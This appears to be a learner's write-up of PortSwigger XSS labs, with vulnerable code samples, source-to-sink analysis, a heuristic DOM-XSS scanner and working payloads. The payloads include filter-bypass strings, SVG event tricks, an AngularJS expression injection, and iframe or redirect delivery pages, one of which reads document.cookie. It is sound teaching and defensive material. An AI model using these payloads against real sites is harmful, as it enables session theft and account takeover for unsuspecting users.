# Basic Concept

![image](https://hackmd.io/_uploads/B10Iw3HN0.png)

An XSS attack delivers a malicious payload to the victim's browser, where it runs as JavaScript in the origin of the vulnerable site and can leak sensitive information (cookies, page content, credentials) back to the attacker.

Note: since 2021 (Chrome 92), `alert()`, `confirm()` and `prompt()` are blocked inside cross-origin iframes, which is why PoCs that are delivered through an iframe use `print()` instead.

# Identify XSS vulnerability

## Automatic Tools

- XSStrike
- Burp Suite Scanner

## Manual

1. Test every entry point: login page, query/search pages, comment forms, ...
2. Positions: URL parameters, POST body, HTTP headers (Referer, User-Agent, custom headers).
3. Determine the XSS context: between HTML tags, inside an HTML attribute, or inside a JavaScript block or string?
4. Test an XSS payload that fits that context.

# XSS type

## Reflected XSS

This type of XSS occurs when a website receives data from an HTTP request and immediately reflects that data in the response.

## Stored XSS

Stored XSS is also known as persistent XSS. Positions where attacker-controlled data is stored and later displayed include:

- user comments
- chat room nicknames
- customer order contact details
- a webmail application displaying a message received over SMTP
- a marketing application displaying a social media post
- a network monitoring application displaying packet data from the network

### Testing Way

When manually testing for stored XSS, we have to find both the "entry point" and the "exit point".

Entry point: where attacker-controllable data can enter the application's processing.
Exit point: where that data might appear in the application's responses (often a different page, or a page seen by a different user).

## DOM-Based XSS

### Window Basic Concept

`window` is the root JavaScript object in a browser, aka the `global object`.

![image](https://hackmd.io/_uploads/B1ejyJi4T.png)

![image](https://hackmd.io/_uploads/rkq5A0UNC.png)

Web page generation:
![image](https://hackmd.io/_uploads/ByQiyywV0.png)

An iframe embeds another document, with its own `window`, inside the current window.

![image](https://hackmd.io/_uploads/S1xPbkD4R.png)

### Vulnerable code -> Source Controllable

The following page takes the `search` query parameter (the source) and writes it into the page with `innerHTML` (the sink), so the attacker controls the HTML that gets parsed:

```htmlembedded
<!-- Reflected DOM XSS: source = location.search, sink = element.innerHTML -->
<!-- Example trigger URL. The payload is <details onpointerenter=a=prompt,a()>, written with
     mixed case and tab / LF / CR separators (%09 %0A %0D) so that simple filters miss it:
     http://127.0.0.1:5500/XSS/DOMXSS/vulnCode/innerHtml.html?search=%3CDEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx%3E3nd -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <p id="results"></p>
    <script>
        const urlParams = new URLSearchParams(window.location.search);
        const search = urlParams.get('search');
        const results = document.getElementById('results');
        results.innerHTML = 'You searched for: ' + search; // dangerous sink
    </script>
</body>
</html>
```

## Identify

Two ways to find the vulnerability:

- DOM Invader (built into Burp Suite's browser)
- the browser's Developer Tools

We need to find every controllable source and trace how it flows into a dangerous sink.

## Controllable Source

### URL (location)

```
window.location.search
location.search
location.hash
```

## Danger Sinks

https://portswigger.net/web-security/cross-site-scripting/dom-based#which-sinks-can-lead-to-dom-xss-vulnerabilities

```
document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent
```

Notice: markup inserted through `innerHTML` never executes `<script>` elements, and `<svg onload>` fires there in Chromium-based browsers but not in all browsers. An element that raises its own event, such as `<img src=x onerror=alert(1)>`, is the portable choice.

### Using DOM Invader to find out DOM-XSS

#### Injecting a Canary

DOM Invader injects a specific string called the "canary" and then automatically parses the DOM to find where that string ends up.

![image](https://hackmd.io/_uploads/Hk9cxXoN6.png)

Manual injecting: inject the canary manually into any input field we want to test.
![image](https://hackmd.io/_uploads/rJllYZ7o46.png)

Exploiting:

```
?search=<img%20src%20onerror=alert(1)>
```

![image](https://hackmd.io/_uploads/Skw5-Qs4T.png)

Automatically:

![image](https://hackmd.io/_uploads/S1nLMXoN6.png)

Notice: injecting the canary into every parameter of the page at once may break the page. When testing a live website, test one source at a time.

![image](https://hackmd.io/_uploads/Hy-QvmoET.png)

![image](https://hackmd.io/_uploads/ByeFMdXj4p.png)

- Outer HTML: the HTML element surrounding the canary.
- Frame Path: the frame in which the canary is passed to the sink.
- Event: the JavaScript event triggered when the canary is passed to the sink.

#### Study the Vulnerable Code

Trace the source and click the Stack trace link for further analysis.

![image](https://hackmd.io/_uploads/SyxN57sNT.png)

![image](https://hackmd.io/_uploads/S12Iq7oVT.png)

### LAB2 - DOM XSS

Source: `window.location.search` / Sink: `document.write`

#### Find out interesting requests

The application reflects user input immediately.

![image](https://hackmd.io/_uploads/H1kgAJiE6.png)

#### Analyse the Dynamic Response

Look up the source code. Vulnerable code:

```javascript
<script>
    function trackSearch(query) {
        document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
    }
    var query = (new URLSearchParams(window.location.search)).get('search');
    if(query) {
        trackSearch(query);
    }
</script>
```

![image](https://hackmd.io/_uploads/B1J9ygjN6.png)

#### Identify

Upon analysis, we found:

![image](https://hackmd.io/_uploads/r1salliET.png)

Now we analyse the context of the reflected query: it lands inside the `src` attribute of an `<img>` tag written by `document.write`, so we close the attribute and the tag, then inject a new element. The `">` left over from the original markup closes our `onload` attribute.

XSS payload:

```
meow"><svg onload="alert(1)
```

![image](https://hackmd.io/_uploads/Sk8OXli4p.png)

Solved!
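The "Identify" step above (find the controllable source, follow it into a sink) is what we do by hand with DOM Invader or DevTools. The following is an added example, my own code and not part of the original notes or of Burp: a line-based triage scanner that marks identifiers assigned from a DOM source as tainted, follows them into locally defined functions, and reports every line where tainted data meets one of the sinks listed above. It is a heuristic for deciding where to set breakpoints, not a real taint tracker, and the sample inputs are the lab snippets from this page plus the jQuery hash example.

```javascript
// Added example: heuristic source -> sink scanner for DOM XSS triage.
const DOM_SOURCES = [
  'location.search', 'location.hash', 'location.href', 'document.URL',
  'document.referrer', 'window.name', 'document.cookie',
];
const DOM_SINKS = [
  'document.write(', 'document.writeln(', 'document.domain', '.innerHTML', '.outerHTML',
  '.insertAdjacentHTML(', 'eval(', 'setTimeout(', 'new Function(',
  '.attr(', '.html(', '.append(', '.after(', '$(',   // jQuery sinks from the list above
];

const escapeRegExp = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
// Identifier occurrence that is not a property access (so `x.query` does not count as `query`).
const hasIdentifier = (line, name) =>
  new RegExp('(^|[^\\w$.])' + escapeRegExp(name) + '(?![\\w$])').test(line);

function scanForDomXss(source) {
  const lines = source.split('\n');
  const tainted = new Set();
  const carriesTaint = (line) =>
    DOM_SOURCES.find((s) => line.includes(s)) || [...tainted].find((v) => hasIdentifier(line, v));

  // Propagate taint until nothing new is learned: `var x = <tainted>` taints x,
  // `f(x)` with a local `function f(p)` taints p.
  let changed = true;
  while (changed) {
    changed = false;
    for (const line of lines) {
      if (!carriesTaint(line)) continue;
      const assign = line.match(/^\s*(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=[^=]/);
      if (assign && !tainted.has(assign[1])) { tainted.add(assign[1]); changed = true; }
      for (const call of line.matchAll(/([A-Za-z_$][\w$]*)\s*\(([^()]*)\)/g)) {
        const def = source.match(new RegExp('function\\s+' + escapeRegExp(call[1]) + '\\s*\\(([^)]*)\\)'));
        if (!def) continue;
        const args = call[2].split(',').map((a) => a.trim());
        const params = def[1].split(',').map((p) => p.trim());
        args.forEach((a, i) => {
          if (tainted.has(a) && params[i] && !tainted.has(params[i])) { tainted.add(params[i]); changed = true; }
        });
      }
    }
  }

  // Report every line where a sink and tainted data appear together.
  const findings = [];
  lines.forEach((line, i) => {
    const sink = DOM_SINKS.find((s) => line.includes(s));
    const via = sink && carriesTaint(line);
    if (via) findings.push({ line: i + 1, sink, via, code: line.trim() });
  });
  return { findings, tainted: [...tainted] };
}

// Constructed inputs: the LAB2 tracker script, the innerHTML page, and the jQuery hash snippet.
const TRACKER_SAMPLE = [
  'function trackSearch(query) {',
  "    document.write('<img src=\"/resources/images/tracker.gif?searchTerms='+query+'\">');",
  '}',
  "var query = (new URLSearchParams(window.location.search)).get('search');",
  'if(query) {',
  '    trackSearch(query);',
  '}',
].join('\n');
const INNERHTML_SAMPLE = [
  'const urlParams = new URLSearchParams(window.location.search);',
  "const search = urlParams.get('search');",
  "const results = document.getElementById('results');",
  "results.innerHTML = 'You searched for: ' + search;",
].join('\n');
const JQUERY_HASH_SAMPLE = [
  "$(window).on('hashchange', function() {",
  '    var element = $(location.hash);',
  '    element[0].scrollIntoView();',
  '});',
].join('\n');
```

Run `scanForDomXss(TRACKER_SAMPLE)` and it reports line 2 (`document.write(` reached via `query`), even though the source is read on line 4 and passed through a function call; the innerHTML page is flagged on its `results.innerHTML` line via `search`, and the jQuery snippet on `$(location.hash)`. Anything the scanner flags still needs to be confirmed in the browser, because it does not see data that crosses files, `postMessage`, or storage.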
### LAB3 - DOM XSS

Source: `window.location.search` / Sink: `document.write`

### Analyse the Attack Surface

![image](https://hackmd.io/_uploads/BywvuboVp.png)

![image](https://hackmd.io/_uploads/rJgdKu-oNp.png)

![image](https://hackmd.io/_uploads/SkvkFZs4a.png)

![image](https://hackmd.io/_uploads/SJQEFbs4a.png)

In the site map, we see `stockCheck.js`. Dangerous sink and source found:

Source:

```javascript
var store = (new URLSearchParams(window.location.search)).get('storeId');
document.write('<select name="storeId">');
if(store) {
    document.write('<option selected>'+store+'</option>');
}
```

Analyse the source:

![image](https://hackmd.io/_uploads/SyAk3-i46.png)

### Identify

The source is written between `<select><option>source</option></select>`. We need to close both tags before we can inject a new element and trigger the XSS.

```
?productId=1&storeId=</option>meow
```

![image](https://hackmd.io/_uploads/ByrrgfsEp.png)

```
/product?productId=1&storeId=</option></select>meow<svg%20onload=alert(1)>
```

(`</select>` alone is enough: the parser closes the open `<option>` implicitly when the `<select>` ends.)

![image](https://hackmd.io/_uploads/Sy23gGsV6.png)

![image](https://hackmd.io/_uploads/BJGbWzsEa.png)

Solved!!

## LAB - DOM XSS in innerHTML sink using source location.search

### Mapping Structure

![image](https://hackmd.io/_uploads/H1SiKzj46.png)

![image](https://hackmd.io/_uploads/r1g3mqGj4T.png)

### Analyse Attack Surface

![image](https://hackmd.io/_uploads/HJblcMjET.png)

![image](https://hackmd.io/_uploads/HkBW5ziN6.png)

### Identify

The website reflects our input.

![image](https://hackmd.io/_uploads/By0t5MiV6.png)

![image](https://hackmd.io/_uploads/rJYOsGjNT.png)

```
/?search=<svg onload=alert(1)>
```

(`<svg onload>` fires when inserted through `innerHTML` in Chromium-based browsers such as Burp's; `<img src=1 onerror=alert(1)>` works everywhere.)

![image](https://hackmd.io/_uploads/ByL0sMjV6.png)

![image](https://hackmd.io/_uploads/BygbnGj4p.png)

Solved

## Source and Sink in third-party dependencies

### DOM XSS in jQuery

jQuery is a JavaScript library that makes it easy to modify document elements and their attributes, which also makes several of its functions sinks.
Vulnerable code:

```javascript
$(function() {
    $('#backLink').attr("href",(new URLSearchParams(window.location.search)).get('returnUrl'));
});
```

The `attr()` function sets the given attribute. Here the `href` value comes straight from a URL parameter, so a `javascript:` URL can be injected; it runs when the victim clicks the link.

```
?returnUrl=javascript:alert(document.domain)
```

## LAB - DOM XSS in jQuery anchor href attribute sink using location.search source

### Mapping structure

![image](https://hackmd.io/_uploads/SJNzW4o46.png)

![image](https://hackmd.io/_uploads/r1zZZNsV6.png)

### Analyse attack surface

![image](https://hackmd.io/_uploads/SkbIb4i46.png)

### Identify

![image](https://hackmd.io/_uploads/ryHtfVo46.png)

![image](https://hackmd.io/_uploads/rybv7ViE6.png)

![image](https://hackmd.io/_uploads/ryaOmNj4p.png)

Solved!!

DOM Invader:

![image](https://hackmd.io/_uploads/SJbMNEjV6.png)

---

### jQuery Selector

The `$()` selector function is another potentially dangerous sink: when it is given a string that looks like HTML, it creates the elements instead of querying for them, so attacker-controlled input becomes injected markup.

For example:

```javascript
$(window).on('hashchange', function() {
    var element = $(location.hash);
    element[0].scrollIntoView();
});
```

An attacker can trigger the `hashchange` event without user interaction by loading the page in an iframe and then changing the fragment of the iframe's `src`; changing only the fragment does not reload the document, it just fires `hashchange`.

PoC:

```htmlembedded
<iframe src="https://vulnerable.com#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
```

## LAB - DOM XSS in jQuery selector sink using a hash event

### Mapping Structure

![image](https://hackmd.io/_uploads/Skhxc_h4T.png)

![image](https://hackmd.io/_uploads/ryfV5d3Vp.png)

### Analyse Attack Surface

![image](https://hackmd.io/_uploads/SJOA9Oh46.png)

The Target Analysis tools found nothing useful, so we have to search for the vulnerability manually.
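Before working through the lab, it helps to see exactly when `$()` treats a string as HTML, because that decision changed between jQuery versions and the answer decides whether `$(location.hash)` (or a selector with the hash concatenated into it) is exploitable. The following is an added example, my own code and not jQuery's or the lab's: the three `quickExpr`/`rquickExpr` regexes are quoted from jQuery's source for the versions named (the `1.9+` entry is the 3.x form; 1.9 introduced the start-of-string requirement), while the classification logic and the two selector builders around them are mine.

```javascript
// Added example: how jQuery's $() decides between "create HTML" and "run a selector".
const RQUICK_EXPR = {
  // before 1.6.3: HTML accepted anywhere in the string, even after '#' (CVE-2011-4969, $(location.hash))
  'before-1.6.3': /^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,
  // 1.6.3 to 1.8.x: a '#' before the '<' stops the HTML match, but any other leading text does not
  '1.6.3-1.8':    /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,
  // 1.9 and later (3.x form): only a string that starts with '<' is HTML
  '1.9+':         /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/,
};

// Returns 'html' (jQuery.parseHTML creates the elements, so <img onerror=...> fires),
// 'id' (getElementById fast path) or 'selector' (handed to Sizzle as a CSS selector).
function classifyJQueryArg(str, version) {
  const re = RQUICK_EXPR[version];
  if (!re) throw new Error('unknown jQuery version bucket: ' + version);
  let match;
  if (str[0] === '<' && str[str.length - 1] === '>' && str.length >= 3) {
    match = [null, str, null];   // jQuery's fast path, identical in every version
  } else {
    match = re.exec(str);
  }
  if (match && match[1]) return 'html';
  if (match && match[2]) return 'id';
  return 'selector';
}

// The selector string built by the hash-event lab for a given (already decoded) fragment.
function blogLabSelector(hash) {
  return 'section.blog-list h2:contains(' + hash + ')';
}

// Safe variant of the same lookup: allow-list the fragment (assumption: post titles only need
// word characters, spaces and hyphens), so the string can never contain a tag.
function safeBlogSelector(hash) {
  return blogLabSelector(hash.replace(/[^\w\s-]/g, ''));
}
```

`classifyJQueryArg('#<img src=x onerror=print()>', 'before-1.6.3')` returns `'html'` (the original `$(location.hash)` bug), while under `'1.6.3-1.8'` the leading `#` makes it a selector. The lab's concatenated selector, `blogLabSelector('<img src=x onerror=print()>')`, is still `'html'` for 1.8 because the regex allows text before the tag, and only becomes a selector from 1.9 on. Upgrading jQuery is therefore a real fix for this sink, but the allow-list in `safeBlogSelector` is the one that does not depend on library behaviour.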
### Identify

Website behaviour:

![image](https://hackmd.io/_uploads/SytlAOnEa.png)

When we go back to the previous page, it automatically scrolls to the previous position.

![image](https://hackmd.io/_uploads/HyEtCOnV6.png)

![image](https://hackmd.io/_uploads/BkFWkth4p.png)

We can guess there is code implementing this functionality. The vulnerable jQuery code is:

![image](https://hackmd.io/_uploads/SkooJt2Ep.png)

```javascript
<script>
    $(window).on('hashchange', function(){
        var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
        if (post) post.get(0).scrollIntoView();
    });
</script>
```

The decoded hash is concatenated into the selector string. With the old jQuery (before 1.9) this page ships, `$()` treats a string that contains a complete tag anywhere as HTML, so the tag is created instead of searched for.

![image](https://hackmd.io/_uploads/r1fmLthET.png)

Testing:

![image](https://hackmd.io/_uploads/rJGDZKn4p.png)

Reflected & DOM XSS

![image](https://hackmd.io/_uploads/HyOCZYhVT.png)

![image](https://hackmd.io/_uploads/S1aUGtnET.png)

Deliver it to the victim, or embed it in another website that lets us insert an iframe:

![image](https://hackmd.io/_uploads/SyZrrK3E6.png)

![image](https://hackmd.io/_uploads/BkEEHKhNa.png)

Payload:

```htmlembedded
<iframe src="https://0a48001f03d228fa8087da4300da0056.web-security-academy.net/#" onload="this.src+='<img src=meow onerror=print()>'"></iframe>
```

Solved!

![image](https://hackmd.io/_uploads/BJaLrY3VT.png)

---

## DOM XSS in AngularJS

AngularJS lets us execute JavaScript without angle brackets or event handlers: any `{{ }}` expression inside an element carrying the `ng-app` attribute is evaluated by AngularJS.

PoC payload:

```
{{$on.constructor('alert(1)')()}}
```

(`$on` is a function on the scope, so `$on.constructor` is `Function`; calling it compiles and runs `alert(1)`.)

## LAB - XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
### Mapping Structure

![image](https://hackmd.io/_uploads/SynNhF2Ea.png)

![image](https://hackmd.io/_uploads/S11osYhE6.png)

### Analyse Attack Surface

![image](https://hackmd.io/_uploads/Byj-2t24p.png)

![image](https://hackmd.io/_uploads/S1Wp3Y3ET.png)

### Identify

![image](https://hackmd.io/_uploads/SkTi3K24p.png)

PoC:

```
{{$on.constructor('alert(1)')()}}
```

![image](https://hackmd.io/_uploads/HyjxpF24p.png)

![image](https://hackmd.io/_uploads/r1uMTF2VT.png)

## Reflected DOM XSS

Pure DOM XSS vulnerabilities are self-contained within a single page. However, a website can also take data from the HTTP request, reflect it in the response, and then have client-side script pass it into a DOM sink; this is reflected DOM XSS.

For instance, a script may process the reflected data unsafely and ultimately write it to a dangerous sink such as `eval`:

Vulnerable code:

```
eval('var data = "reflected string"');
```

## LAB - Reflected DOM XSS

### Mapping target

![image](https://hackmd.io/_uploads/rJ8Ax36V6.png)

![image](https://hackmd.io/_uploads/H1Edgn6Na.png)

### Analyse attack surface

Finding interesting requests:

![image](https://hackmd.io/_uploads/B1o3x2aN6.png)

Browse the dynamic URLs in the browser and send those requests to Repeater.

Interesting behaviour:

![image](https://hackmd.io/_uploads/HJ-ib36N6.png)

![image](https://hackmd.io/_uploads/ByAhb3p46.png)

### Identify

According to the previous investigation,
we can audit how the website displays the search response.

Auditing the `/?search=360783` page, we found that `/` imports `searchResults.js`.

![image](https://hackmd.io/_uploads/ByjW4np4a.png)

![image](https://hackmd.io/_uploads/rkaMXhpVp.png)

path -> search-results

![image](https://hackmd.io/_uploads/H1kJr2p46.png)

![image](https://hackmd.io/_uploads/rya9In64a.png)

---

Sink:

```
eval('var searchResultsObj = ' + this.responseText);
```

![image](https://hackmd.io/_uploads/HJtBCnpVa.png)

The `eval` sink can be tested locally. If the reflected value is `"-alert(1)` and the server does not escape it, the code that gets evaluated is `var jsonOBJ = ""-alert(1)`:

```javascript
eval('var jsonOBJ = "' + '"-alert(1)' + '"');
```

---

Escaping the JSON filter and dealing with the JSON format

If we input `"`, the server escapes the double quote with a backslash (`\"`), but it does not escape backslashes themselves. So if we send `\"`, the result is `\\"`: the first backslash escapes the second one and the quote is left unescaped, which closes the `searchTerm` string. The subtraction operator then separates the string from the JavaScript we inject, a closing curly bracket closes the JSON object, and two forward slashes comment out the rest of the object.

Payload:

```
\"-alert(1)}//
```

Any double quotes inside the injected JavaScript would be escaped too, so avoid them (use `alert(1)` or `alert(document.domain)` rather than `alert("...")`).

![image](https://hackmd.io/_uploads/B1bAlapET.png)

Solved!!
## Stored DOM XSS

A website may also store data we control on the server; when another page later retrieves that data and uses a script to display it in an unsafe way, the result is stored DOM XSS.

### LAB - Stored DOM XSS

#### Mapping target

![image](https://hackmd.io/_uploads/r1bgJA6VT.png)

![image](https://hackmd.io/_uploads/SyTQJC6Vp.png)

#### Analyse Attack surface

Finding interesting requests:

![image](https://hackmd.io/_uploads/SkeuJAaNa.png)

![image](https://hackmd.io/_uploads/rkG9M0pNp.png)

Interesting JavaScript: we find the controllable source, next we have to find the sink.

![image](https://hackmd.io/_uploads/ByspeCpVp.png)

![image](https://hackmd.io/_uploads/BJqELATNT.png)

#### Identify

Analyse the post comment functionality:

![image](https://hackmd.io/_uploads/SysZzRa46.png)

![image](https://hackmd.io/_uploads/r1BSMRaEp.png)

The script escapes the comment with `replace('<', '&lt;')` and `replace('>', '&gt;')`. With a string pattern, `replace()` only rewrites the first occurrence, so a leading `<>` absorbs both replacements and every tag after it passes through untouched.

Stored DOM XSS in comment:

```
<><img src=meow onerror=alert(1)>
```

Passing source to sink:

![image](https://hackmd.io/_uploads/rymcIRpNT.png)

![image](https://hackmd.io/_uploads/rJyjv0TVa.png)

Trigger arbitrary JS:

![image](https://hackmd.io/_uploads/S1V6B0T4a.png)

Solved!!

## Common DOM XSS Danger Sinks

The following are some of the main sinks that can lead to DOM XSS vulnerabilities:

```
document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent
```

The following jQuery functions are also sinks that can lead to DOM XSS vulnerabilities:

```
add() after() append() animate() insertAfter() insertBefore() before() html() prepend() replaceAll() replaceWith() wrap() wrapInner() wrapAll() has() constructor() init() index() jQuery.parseHTML() $.parseHTML()
```

# XSS Context

It is essential to identify where in the response our controllable data appears, and to check whether the application performs any validation or other processing on the data before it lands there.
Cheat sheet: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

## Between HTML tags

If the source is located between HTML tags, we can insert an HTML tag or a script element to trigger XSS.

PoC:

```
<script>alert(document.domain)</script>
<img src=1 onerror=alert(1)>
```

### WAF (Web Application Firewall)

![image](https://hackmd.io/_uploads/SJoAUmxS6.png)

### LAB - Reflected XSS into HTML context with most tags and attributes blocked

#### Mapping target

![image](https://hackmd.io/_uploads/ByVeXIyBT.png)

![image](https://hackmd.io/_uploads/ryLXmI1ra.png)

#### Analyse Attack Surface

Finding interesting requests:

![image](https://hackmd.io/_uploads/ByLcQIJrp.png)

It reflects our input between the `<h1>` tags.

![image](https://hackmd.io/_uploads/HJgIUf8yHp.png)

#### Identify

Attempting to inject the PoC payload:

```
<img src=x onerror=alert(1)>
```

![image](https://hackmd.io/_uploads/SkE9rUJS6.png)

![image](https://hackmd.io/_uploads/r1HYBUyB6.png)

However, it is filtered by the WAF. We fuzz it to determine whether the rule is an allow list or a block list, and to find what gets through.

![image](https://hackmd.io/_uploads/SyBozLkH6.png)

#### Fuzzing Tags

![image](https://hackmd.io/_uploads/rJVTrLySa.png)

![image](https://hackmd.io/_uploads/S12J881Hp.png)

![image](https://hackmd.io/_uploads/HkSNLLJBT.png)

![image](https://hackmd.io/_uploads/HJO9ILyHp.png)

We discover the `<body>` tag is allowed. Next, we try to inject this payload:

```
<body onload=alert>
```

![image](https://hackmd.io/_uploads/BkHrv8kHT.png)

According to the error response, the attribute is blocked too, so we need to find an allowed attribute in the same way.
#### Fuzzing valid attributes

![image](https://hackmd.io/_uploads/HyHPd81Ha.png)

![image](https://hackmd.io/_uploads/B1mFuLkSp.png)

![image](https://hackmd.io/_uploads/HJdsOUkHp.png)

![image](https://hackmd.io/_uploads/SJkWtLkSp.png)

Payload:

```
?search=<body+onresize%3dprint()>
<body onresize=print()>
```

![image](https://hackmd.io/_uploads/BkQ1cIkHp.png)

`onresize` only fires when the window is resized, so we need a delivery page that makes the victim's browser trigger it.

#### Trigger onresize attribute by iframe

Loading the vulnerable page inside an iframe and changing the iframe's width once it has loaded resizes the embedded window and fires `onresize`:

```html
<iframe src="https://0af400c104ed4fd780a9767f008c002c.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'></iframe>
```

![image](https://hackmd.io/_uploads/HylcqUyra.png)

![image](https://hackmd.io/_uploads/rJvc9LJST.png)

Solved!!

### LAB - Reflected XSS into HTML context with all tags blocked except custom ones

#### Analyse Attack surface

Evaluate user input:

![image](https://hackmd.io/_uploads/ByivJPyST.png)

Tags are not allowed!

![image](https://hackmd.io/_uploads/ry1TywkSp.png)

![image](https://hackmd.io/_uploads/ryeZgD1rT.png)

![image](https://hackmd.io/_uploads/H1cUxwJSa.png)

It allows non-standard (custom) tags.

#### tabindex attribute

![image](https://hackmd.io/_uploads/SyMBeElST.png)

```htmlembedded
<div id=meow tabindex="1">
    <p>This is the first focusable element.</p>
</div>
```

The `tabindex` attribute makes an element focusable. When we open `http://website.com#meow`, the browser navigates to the element whose ID is `meow`

![image](https://hackmd.io/_uploads/S1e3WVeBp.png)

and that element receives focus automatically. We can exploit this with an `onfocus` handler to trigger JavaScript without any user interaction.
We can test:

```
<meowtag id=focusmeow onfocus=alert(1) tabindex="1">
```

```
?search=<meowtag id=focusmeow onfocus=alert(1) tabindex=1>#focusmeow
```

![image](https://hackmd.io/_uploads/BkDUBVeBa.png)

![image](https://hackmd.io/_uploads/S1CQuNera.png)

Delivery page:

```htmlembedded
<script>
location="https://0a7400780492b48b804308d300cd0073.web-security-academy.net/?search=<meowtag id=focusmeow onfocus=alert(document.cookie) tabindex=1>#focusmeow";
</script>
```

![image](https://hackmd.io/_uploads/rkBHuNxH6.png)

Solved!!

### LAB - Reflected XSS with event handlers and href attributes blocked

#### Mapping target

![image](https://hackmd.io/_uploads/HyphfrlST.png)

#### Analyse Attack surface

Finding interesting requests:

![image](https://hackmd.io/_uploads/H1IEQHeH6.png)

Evaluate user input:

![image](https://hackmd.io/_uploads/ryv27BxHa.png)

#### Identify

Testing:

```
<img src=x onerror=alert(1)>
```

![image](https://hackmd.io/_uploads/Bk_MVHxrp.png)

```
<meow>
```

![image](https://hackmd.io/_uploads/SJwF4rxHa.png)

Based on the result, we can infer that the website uses an allow list to filter tags.

#### Fuzzing Tags

![image](https://hackmd.io/_uploads/HyY3TSxHp.png)

```
<svg onload=alert(1)>
```

![image](https://hackmd.io/_uploads/SJzeRreHT.png)

The `onload` attribute is not allowed.

#### Fuzzing Events

![image](https://hackmd.io/_uploads/r1ycBLeST.png)

All JavaScript event handlers are blocked, and the `<a>` tag's `href` attribute is blocked as well.

![image](https://hackmd.io/_uploads/S1PfU8erp.png)

#### Survey the SVG animate element

Documentation:

![image](https://hackmd.io/_uploads/rJ4gr8grT.png)

An SVG `<animate>` element can set the `href` attribute of its parent `<a>` at runtime, so the word `href` never appears as an attribute in our input:

```
<svg width="100" height="100" xmlns="http://www.w3.org/2000/svg">
  <a href="meow">
    <animate attributeName="href" values="javascript:alert('Hello!')" dur="1s" repeatCount="1" />
    <text x="10" y="40">Click me</text>
  </a>
</svg>
```

![image](https://hackmd.io/_uploads/BJISnEeB6.png)

We can remove the `href` and the other unnecessary elements and attributes and still trigger the XSS (the victim has to click the text).
```
<svg>
  <a>
    <animate attributeName="href" values="javascript:alert('Hello!')" />
    <text x="10" y="40">Click me</text>
  </a>
</svg>
```

![image](https://hackmd.io/_uploads/HkftTEgSp.png)

```
<svg><a><animate attributeName="href" values="javascript:alert('Hello!')" /><text x="10" y="40">Click me</text></a></svg>
```

![image](https://hackmd.io/_uploads/S1WzC4xH6.png)

Solved

### LAB - Reflected XSS with some SVG markup allowed

![image](https://hackmd.io/_uploads/Skv3C8eHa.png)

```
?search=<svg onload=alert(1)>
```

![image](https://hackmd.io/_uploads/Sy7-JPxST.png)

```
?search=<img+src%3dx+onerror%3dalert(1)>
```

Tags are not allowed.

![image](https://hackmd.io/_uploads/SkcOkDlB6.png)

#### Fuzzing Tags

![image](https://hackmd.io/_uploads/HydQMPxHp.png)

#### Fuzzing Events

![image](https://hackmd.io/_uploads/ryqmrPxr6.png)

#### Survey animateTransform

![image](https://hackmd.io/_uploads/HJqAWDxB6.png)

```htmlembedded
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
  <rect width="50" height="50" fill="blue">
    <animateTransform attributeName="transform" attributeType="XML" type="rotate" dur="2s" values="0;360" repeatCount="indefinite" onbegin=alert(1) />
  </rect>
</svg>
```

![image](https://hackmd.io/_uploads/SydFUwlrT.png)

Remove the elements and attributes that are not required, so that less of the payload is exposed to the WAF. `onbegin` fires when the animation starts, with no user interaction:

```htmlembedded
<svg>
  <animateTransform onbegin=alert(1) />
</svg>
```

```
<svg><animateTransform onbegin=alert(1)></svg>
```

![image](https://hackmd.io/_uploads/r1MPwweSa.png)

![image](https://hackmd.io/_uploads/BkExFvxBa.png)

![image](https://hackmd.io/_uploads/rkCbKwgBT.png)

Solved!!

## In the HTML Attribute Value

Sometimes it is possible to terminate the element with `">`, but more commonly the angle brackets are blocked or encoded by the filter. If the filter still lets us terminate the attribute value with `"`, we can append a new event handler attribute to trigger XSS, as in the following payload.
```htmlembedded
" autofocus onfocus=alert(1) close="meow
```

(Observed while testing: this fired in Chrome but not in Firefox.)

### LAB - Reflected XSS into attribute with angle brackets HTML-encoded

### Mapping target

![image](https://hackmd.io/_uploads/Hy7v1dgH6.png)

### Analyse Attack surface

![image](https://hackmd.io/_uploads/B1h21ugBp.png)

#### ?/search=p1

![image](https://hackmd.io/_uploads/BJbvxOeBp.png)

### Identify

![image](https://hackmd.io/_uploads/HyYixOgH6.png)

```
/?search=" autofocus onfocus=alert(1) x="x
```

![image](https://hackmd.io/_uploads/B1vsQOlB6.png)

![image](https://hackmd.io/_uploads/SJT2mdera.png)

Solved!!

---

### Double quotes HTML-encoded

When the quotes are encoded but the value lands in an `href`, we do not need to break out of the attribute at all: a `javascript:` URL is enough.

```
<a href="javascript:alert(document.domain)">
```

### LAB - Stored XSS into href attribute of anchor with double quotes HTML-encoded

#### Mapping target

![image](https://hackmd.io/_uploads/BJl6XclB6.png)

![image](https://hackmd.io/_uploads/Sk4qXclS6.png)

#### Analyse Attack Surface

/post/comment

![image](https://hackmd.io/_uploads/ryv545lH6.png)

#### Identify

![image](https://hackmd.io/_uploads/HkIx8qgHp.png)

```
javascript:alert(1)
```

![image](https://hackmd.io/_uploads/r1UBU9lHp.png)

![image](https://hackmd.io/_uploads/S1ZLIqeBT.png)

Solved

---

Elements that are not normally interactive can still run an event handler through an `accesskey`; the handler fires when the victim presses the access key combination (Alt+Shift+X on Windows, Ctrl+Alt+X on macOS):

```
<input type="hidden" accesskey="x" onclick="alert(1)">
```

```
